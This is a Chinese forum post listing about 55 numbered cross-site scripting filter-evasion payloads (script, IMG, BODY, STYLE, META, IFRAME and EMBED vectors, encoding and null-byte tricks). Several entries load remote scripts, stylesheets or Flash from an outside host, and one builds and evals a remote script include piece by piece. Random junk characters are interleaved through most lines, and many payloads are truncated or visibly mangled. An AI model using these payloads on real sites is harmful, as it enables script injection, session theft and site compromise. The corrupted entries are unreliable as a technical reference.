(1)普通的XSS JavaScript注入
2 z# Z2 v9 \1 E) s; _/ h/ l<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 K& D; o2 j3 }: M- I(99)另类弹框6 p6 n" @9 `: h* B9 O, v, f
<q/oncut=alert()>1
6 y- X- G/ W5 K& k<s/onclick=alert()>b$ n) r$ A; x6 v6 Q, ]! D& R7 {
<XSS=" onclick="alert(1)//">clickme</SSX=">
: K+ ]; ]& p* p0 K: Z7 ]* C <zzz onclick=alert`1`>clickme</zzz> % u5 }; t9 S- s
<a onclick=alert`1`>clickme</a>
, C# f5 ?& O1 R<a=">clickme</a=">2 m7 y$ H3 A' ?0 `( t
<a=">clickme</a>0 [+ H9 I- s" a7 K0 ` H
<z=">clickme</z=">
; o" ]3 z- n0 B8 r<z onclick=alert`1`>clickme</z>
# j6 ]2 k* E$ a' p! L# @
3 S0 |7 s+ v9 e) @9 S- [(2)IMG标签XSS使用JavaScript命令& k# @0 j! T) K7 U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% s0 \3 u4 a4 `( |; I; B: m& t" Z8 p) f9 s* v V
(3)IMG标签无分号无引号
@3 B( c! S! i0 X' |* \<IMG SRC=javascript:alert(‘XSS’)>$ s8 P6 F1 G2 m5 j! i3 @- d. W
2 [9 x9 c8 H/ t/ j
(4)IMG标签大小写不敏感
8 o7 v1 F& ?4 C0 c- m2 }! l! y4 J<IMG SRC=JaVaScRiPt:alert(‘XSS’)>5 V. Z0 n) C2 R. b+ O
2 X# I# g7 Y z z9 G(5)HTML编码(必须有分号), U$ {" u; S2 A+ C4 O, m
<IMG SRC=javascript:alert(“XSS”)>3 J% h3 B# z' ^# k" x1 o7 M5 Z
+ `4 o" ]0 I) {6 Y; i5 A
(6)修正缺陷IMG标签
- a3 s$ f1 h0 d. C' S* w( C<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# G7 _- o9 C# b4 Y/ `
' A7 |1 `, d. y) C- m2 [9 M(7)formCharCode标签(计算器)
& [. | \( t/ K/ r. `$ t<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ a+ m" w# D8 O `, ]# e
$ Z& W+ U) y% V: @) p6 Q/ e(8)UTF-8的Unicode编码(计算器)
( d+ J+ Q& N2 y; b, E- k% M$ x<IMG SRC=jav..省略..S')>
: y! _9 o& A4 ?, c9 Q; c |* ^. j2 Y/ O3 c; |1 ` B
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% }1 C4 R1 o7 B% e9 e<IMG SRC=jav..省略..S')>' r* U p0 H" T1 X
# X% R9 l$ {! A8 n% D. p(10)十六进制编码也是没有分号(计算器)2 `6 X) [. H) L& \) h: R- t
<IMG SRC=\'#\'" /span>
: m/ Y$ }, [! h& n. F+ Z- i: z, T3 I$ ^! K/ g9 k$ s6 Y
(11)嵌入式标签,将Javascript分开
% ?- D" E& v- }' M( p<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: E% R8 F7 _" R6 D& O1 F: o( r% g' P' P: Q
(12)嵌入式编码标签,将Javascript分开 p$ q5 O2 q& f8 O/ t+ x& U
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! Z2 R) @* q6 X/ [' u
+ H0 f) b8 w: R# J(13)嵌入式换行符8 k. \ l2 p! o) y K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; Y$ n& p+ N$ C9 }4 h( L, R) X
+ B: H4 u6 h" E* m& e; k
(14)嵌入式回车
/ p, s0 p9 U1 c) f2 ^+ X3 n6 U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> u: }& U9 h; Y+ ^/ ]2 e( ] Y
+ w- _9 y1 g3 |* p0 X! F4 ?, h3 W
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; Z7 k3 P! e5 K& f; V) S& l2 c
<IMG SRC=\'#\'" /span>
2 ^% b5 i- F0 `- [
/ }, ^; f0 q$ V% z {' R3 h2 P: ](16)解决限制字符(要求同页面)! y$ k: @' w8 ?5 Z1 w
<script>z=’document.’</script>
8 d1 E( @: @6 s# o) O9 p5 G/ j7 W" I<script>z=z+’write(“‘</script>7 r4 Q: Z- x9 i! p# U
<script>z=z+’<script’</script>
" U/ y5 B) A; I1 F; J8 R$ J<script>z=z+’ src=ht’</script>, _; I J$ q' p
<script>z=z+’tp://ww’</script>$ ^' u) B$ {5 e+ J
<script>z=z+’w.shell’</script>5 x( P/ Y! h' K/ J0 ]" M
<script>z=z+’.net/1.’</script>( ?; |* e5 Z" d T
<script>z=z+’js></sc’</script>& W5 g: ~( H- a; t" t
<script>z=z+’ript>”)’</script>. M6 O3 {4 C5 |( f
<script>eval_r(z)</script>- d' G8 ?) V* ?; p5 d1 e! M
( O$ ]% |7 H, x% _
(17)空字符
% A3 q% ^4 x/ s$ p0 N9 i U5 Eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' W6 ]6 x/ x0 p4 L
6 z. y( a1 |* L. Z# ~(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 H9 q& p1 R) S0 s8 C
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out2 g! p! t& s N' |
$ |: W9 {7 M8 x5 I' B6 a) t
(19)Spaces和meta前的IMG标签% N4 b. j H! i$ ]
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>. B% I* T' Z' C2 D
7 f+ ?/ l* k( ]) m0 m
(20)Non-alpha-non-digit XSS- O( X3 B' L+ S% R' l( M' |
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
0 w4 X- l) ]% u* ]- c: q6 z+ J8 n0 g' r: z/ @. ?9 E3 p2 E
(21)Non-alpha-non-digit XSS to 29 J" I9 m6 u! J( J1 _3 Q" }
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& {5 q: T3 P$ l4 `# C9 Z7 ^+ S2 ?& x- i/ o4 H9 O
(22)Non-alpha-non-digit XSS to 3' t2 R7 {4 K4 `# E$ r
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT> E0 b, x9 H0 k
' x5 R# ^/ ^3 T6 [9 L4 n& m
(23)双开括号3 ?2 K! ]2 P9 T4 f9 B! @
<<SCRIPT>alert(“XSS”);//<</SCRIPT>5 k" T* z7 ?$ C# z; {0 y/ [3 i, v- k
3 V( f0 W& y" o' K3 _5 y(24)无结束脚本标记(仅火狐等浏览器)+ m& U$ ^! I: P1 A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ i( f- m9 q" d$ Q6 f4 e# A) A9 }. {
(25)无结束脚本标记22 n# ~, z4 i! S& H [; D
<SCRIPT SRC=//3w.org/XSS/xss.js>
( s: t; \2 m2 x) t1 O, Z% X, z! h9 g" w) t. `: m# {! `
(26)半开的HTML/JavaScript XSS
. S! v/ R, D: U% q0 U. |<IMG SRC=\'#\'" /span>
# M& ]. _4 D) V/ E
& e% d* S6 _1 ~9 G6 P) ]) s6 l3 X(27)双开角括号
i" m, z8 r. m- ~<iframe src=http://3w.org/XSS.html <1 k1 W+ h; W- R4 o& m
* L8 {% [+ Y, O0 F1 b; U9 O# w- }
(28)无单引号 双引号 分号0 X, f: \' k# V0 W" S
<SCRIPT>a=/XSS/# q6 [0 l8 a$ L6 u+ |
alert(a.source)</SCRIPT>& ^8 E/ ?4 u, o9 b' r& {
3 V" ?1 y8 D$ }(29)换码过滤的JavaScript1 @7 B- Y% Z- X
\”;alert(‘XSS’);//
$ m8 C/ g. M$ ^1 k5 a5 |- s
! U" b7 G+ @5 n4 l9 z(30)结束Title标签 S- R" c$ h* g, a+ X- l" l
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. i0 {6 Q& K$ i" D! A+ r
5 w& w. q- V$ L6 G8 }/ U0 h9 d$ a
(31)Input Image- P3 x+ \8 F+ _4 ]8 S+ C
<INPUT SRC=\'#\'" /span>
9 \9 X2 ~, J: L# y Q: i+ ?
- a' P- [4 ]+ K: x(32)BODY Image: t* x b6 M) D' m3 c
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 n, m: f7 `1 H1 |* a8 I7 B4 T3 w: y. L7 V+ ~2 _! e
(33)BODY标签( F5 t- M3 D2 F: n: |4 P. S
<BODY(‘XSS’)>
k1 o& P u$ ^) g7 K& P/ _8 z2 b) M1 w+ E7 F% B* q" e
(34)IMG Dynsrc
/ s- e! N7 B [# D: z9 ^& ^<IMG DYNSRC=\'#\'" /span>
6 z- B+ a$ [6 ^+ ]- S/ {# f+ }. q/ y8 K
(35)IMG Lowsrc+ H" |6 T/ i+ J0 K; L
<IMG LOWSRC=\'#\'" /span>
# I5 C. W! q3 D) N f3 i3 C8 f% ^1 {3 |& v
(36)BGSOUND
7 p" C. }5 j& }9 B<BGSOUND SRC=\'#\'" /span>
% O9 u- n" J: J L2 q
Q/ i/ X' ?3 S/ Q+ q(37)STYLE sheet
. {* k' U, _5 W7 D7 W<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
: m& R0 @5 M+ \" N, S: X4 T1 C
1 K2 W& h5 z0 I. G, l* @5 m(38)远程样式表6 E! D' i9 V, G. [0 y& M5 W0 M
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" f- V, {, |6 e* s0 m4 U' K
7 A/ e* ~; [4 y# Y" H3 F
(39)List-style-image(列表式)
% C* C$ k( `% ^/ [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" [7 [9 _4 X/ h3 {" ]$ c i: M
- a8 ~$ a: h: D$ {4 {(40)IMG VBscript
2 H+ @/ q; a# Z" w, `9 ?<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
% Y" J9 W2 c: p; s$ D3 Q+ }3 K2 I
4 L5 X# j& |4 f( p(41)META链接url& v& A8 e# \. h
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 C) v4 X9 M/ `: K6 ?, f2 w6 K- d n6 m
+ R( I: J- k' Z6 }* |) A(42)Iframe
0 D) x# |3 i7 t3 ^* i<IFRAME SRC=\'#\'" /IFRAME>. d/ @) b h( p" p
0 n1 f, K: W$ I' u(43)Frame0 A/ F: v' t( ]$ s$ s* f* U6 ^
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
, {1 O6 X/ I: M: `3 |, J/ x' B: h* |" m
(44)Table$ Y( C" o8 }; ?" S7 D, R
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. o, k+ v4 G6 ?& U( J$ m
* N* ]4 ^: y3 n- w( M" D* {(45)TD" s' Z. {8 X) C' [
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>( \: S" i. X4 @& H* L
7 P' r9 f6 Y" w/ C% l(46)DIV background-image/ l4 U: b4 Y1 K0 ^
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% h+ L! [( x! q: L$ L
# b- Q% `( y I8 ^(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
3 W. a4 F! U$ V+ u: j3 \<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
# s+ d) W' W' ]
/ O/ o4 ?1 D, `) @5 D2 D& H(48)DIV expression5 S/ h, y) u* M* O5 Z* g
<DIV STYLE=”width: expression_r(alert(‘XSS’));”> k& F( w0 y0 ]8 _1 `
* ]1 s& r% i7 Y) Z
(49)STYLE属性分拆表达9 ]2 V5 d7 F2 l7 i2 M! r* T2 {8 L5 X# U
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; a7 L7 _$ {% t% z
* ~, b' A8 {/ Y$ n) A(50)匿名STYLE(组成:开角号和一个字母开头)
9 I4 Y0 F* `1 J# d: Y! K$ \<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" Z k! E, w9 A6 J
! O* k1 G) G1 Y7 H: t/ A, H. }. c(51)STYLE background-image0 N% C/ Y8 h3 V% S
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>" b, P& U. L; F
1 s( R" H7 d2 o' d6 ?4 d
(52)IMG STYLE方式
9 U: d: [, \! N6 |) G2 _/ N; Aexppression(alert(“XSS”))’>, ?2 N2 i. j4 [8 ^) b
, d2 D- C) U) c8 F6 c8 W ^(53)STYLE background
; o: [" {: X5 y& n& [<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 F% T G( z. Z& i
, X7 M; ~0 y f9 m- H9 h/ c(54)BASE5 Q# g3 Y& M% }$ T$ | @) {$ P- O
<BASE HREF=”javascript:alert(‘XSS’);//”># a0 h- D; ?$ E" @- q; j
2 N* p5 V' e$ f: Y! a! h; k! T(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 i( m2 ^1 D8 a+ [: _<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
! d9 D( U8 o# H: y |
发表于 2016-4-28 10:06:15